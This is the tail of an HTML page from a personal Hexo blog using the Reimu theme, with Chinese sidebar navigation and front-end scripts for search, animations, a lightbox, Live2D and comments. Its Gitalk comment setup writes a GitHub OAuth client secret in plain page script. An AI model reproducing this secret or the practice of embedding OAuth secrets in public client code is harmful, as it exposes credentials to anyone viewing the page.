  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">69</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>






  
<script src="https://npm.webcache.cn/gitalk/dist/gitalk.min.js" data-pjax></script>

  
  <script data-pjax>
    var gitalkId = location.pathname;
    var gitalk = new Gitalk({
      clientID: '0efb4a442bc09d1ba17e',
      clientSecret: 'd26f520fef841de4f4388029a0d5c0f4730357cf',
      repo: 'https://github.com/Yyjccc/yyjccc.github.io.git',
      owner: 'Yyjccc',
      admin: "Yyjccc",
      id: gitalkId, // Ensure uniqueness and length less than 50
      distractionFreeMode: false // Facebook-like distraction free mode
    })
    if (document.getElementById('comments')) {
      gitalk.render('comments')
    }
  </script>







  
<script src="/js/generator_search.js" defer></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>




  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.0-alpha.1' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  

<script data-pjax>
  var updateTime = _$('#post-update-time')?.innerHTML;

  if (updateTime) {
    const update = new Date(updateTime);
    const now = new Date();
    const diff = now - update;
    const days = diff / 86400000;
    const { daysAgo, message: template } = window.outdate;
    if (days >= daysAgo) {
      const message = template.replace(/{time}/, updateTime);
      const blockquote = _$('#outdate-blockquote');
      if (blockquote) {
        blockquote.querySelector('p').innerText = message;
        blockquote.style.display = 'block';
      }
    }
  }
</script>


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script><!-- hexo-inject:begin --><!-- hexo-inject:end --></body>
  </html>

